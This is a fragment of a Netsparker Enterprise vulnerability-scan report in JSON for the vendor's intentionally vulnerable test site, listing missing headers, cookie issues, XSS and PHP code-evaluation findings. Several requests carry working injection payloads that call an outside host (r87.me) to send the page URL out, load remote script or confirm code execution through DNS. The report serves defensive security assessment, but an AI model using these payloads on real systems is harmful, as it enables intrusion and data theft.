"25/06/2021 01:52 AM", + "Name": "Out-of-date Version (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of PHP to the latest stable version.
    ", + "RemedyReferences": "
    ", + "Severity": "Critical", + "State": "Present", + "Type": "PhpOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "103", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "693", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

    \n

    The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4f5de955-5e9d-4746-3fc0-ad490209f0e6", + "Impact": "
    \n

    Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is \"hijacking\" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.

    \n

    Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-Frame-Options Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n\n
    ", + "RemedyReferences": "
    ", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXFrameOptionsHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "164.308(a)", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected a missing X-XSS-Protection header which means that this website could be at risk of a Cross-site Scripting (XSS) attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 05:45 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "f4fdd62e-a869-499f-b70d-ad48032ad260", + "Impact": "
    This issue is reported as additional information only. There is no direct impact arising from this issue.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-XSS-Protection Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Add the X-XSS-Protection header with a value of \"1; mode= block\".\n\n
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXssProtectionHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": null, + "Cvss31": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Cookies are typically sent to third parties in cross origin requests. This can be abused to do CSRF attacks. Recently a new cookie attribute named SameSite was proposed to disable third-party usage for some cookies, to prevent CSRF attacks.

    \n

    Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "68368f54-b163-41d0-430c-ad49020a4d6b", + "Impact": "", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "SameSite Cookie Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "

    The server can set a same-site cookie by adding the SameSite=... attribute to the Set-Cookie header. There are three possible values for the SameSite attribute:

    \n\n

     

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "SameSiteCookieNotImplemented", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise detected Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=%3ciMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2983\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:39 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "6f963587-2af9-4fac-7b41-ad490211f172", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:\n\n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    \n

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    \n

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

    \n
    ", + "RemedyReferences": "
    ", + "Severity": "High", + "State": "Revived", + "Type": "BlindXss", + "Url": "http://php.testsparker.com/artist.php?id=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3E" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "23", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "94", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a Remote Code Evaluation (PHP) by capturing a DNS A request, which occurs when input data is run as code.

    \n

    This is a highly critical issue and should be addressed as soon as possible.

    ", + "ExploitationSkills": "
    This vulnerability is not difficult to leverage. PHP is a high level language for which there are vast resources available. Successful exploitation requires knowledge of the programming language, access to the source code or the ability to produce source code for use in such attacks, and minimal attack skills.
    ", + "ExternalReferences": "
    ", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "name", + "Type": "Querystring", + "Value": "+gethostbyname(trim('pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc'.'6ii.r87.me'));//", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2770\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:50:36 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "c7139765-b9c1-494c-7b46-ad490211f1ab", + "Impact": "
    An attacker can execute arbitrary PHP code on the system. The attacker may also be able to execute arbitrary system commands.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Out of Band Code Evaluation (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Do not accept input from end users that will be directly interpreted as source code. If this is a business requirement, validate all the input on the application and remove all the data that could be directly interpreted as PHP source code.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "OutOfBandRcePhp", + "Url": "http://php.testsparker.com/hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.8" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:H/IR:H/AR:H" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.

    \n

    CSP can be enabled instructing the browser with a Content-Security-Policy directive in a response header;

    \n
     Content-Security-Policy: script-src 'self';
    \n

    or in a meta tag;

    \n
    <meta http-equiv=\"Content-Security-Policy\" content=\"script-src 'self';\"> 
    \n

    In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:

    \n\n

    When setting the CSP directives, you can also use some CSP keywords:

    \n\n

    In addition to CSP keywords, you can also use wildcard or only a scheme when defining whitelist URLs for the points. Wildcard can be used for subdomain and port portions of the URLs:

    \n
    Content-Security-Policy: script-src https://*.example.com;
    \n
    Content-Security-Policy: script-src https://example.com:*;
    \n
    Content-Security-Policy: script-src https:;
    \n

    It is also possible to set a CSP in Report-Only mode instead of forcing it immediately in the migration period. Thus you can see the violations of the CSP policy in the current state of your web site while migrating to CSP:

    \n
    Content-Security-Policy-Report-Only: script-src 'self'; report-uri: https://example.com;
    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "e172ace9-3b52-43f6-3fca-ad490209f280", + "Impact": "

    There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out this extra layer of security.

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Content Security Policy (CSP) Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "

    Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CspNotImplemented", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 70, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected Possible Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application, but was unable to confirm the vulnerability.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /products.php?pro=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "pro", + "Type": "Querystring", + "Value": "'\"-->", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2824\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:00 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "d442332c-e250-4c70-7b3c-ad490211f13b", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:\n\n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "[Possible] Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    \n

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    \n

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

    \n
    ", + "RemedyReferences": "
    ", + "Severity": "High", + "State": "Revived", + "Type": "PossibleBlindXss", + "Url": "http://php.testsparker.com/products.php?pro=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "6.5" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.7" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.7" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:U/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "200", + "Hipaa": "", + "Owasp": "A6", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected that no Referrer-Policy header implemented.

    \n

    Referrer-Policy is a security header designed to prevent cross-domain Referer leakage. 

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4576a39d-e4a5-481f-3fcf-ad490209f34b", + "Impact": "

    Referer header is a request header that indicates the site which the traffic originated from. If there is no adequate prevention in place, the  URL itself, and even sensitive information contained in the URL will be leaked to the cross-site.

    \n

